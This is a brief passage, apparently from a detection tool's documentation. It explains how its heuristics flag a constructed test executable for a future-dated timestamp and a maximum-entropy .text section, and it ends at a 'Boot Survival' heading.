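          On the constructed image the two findings are the future timestamp, decoded to 2044-08-27 21:58:02 UTC exactly as the report prints it, and the 8.00-bit .text section; the read-only .rdata section stays quiet because the entropy rule is restricted to executable sections, which keeps compressed resources from tripping it.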

          Boot Survival: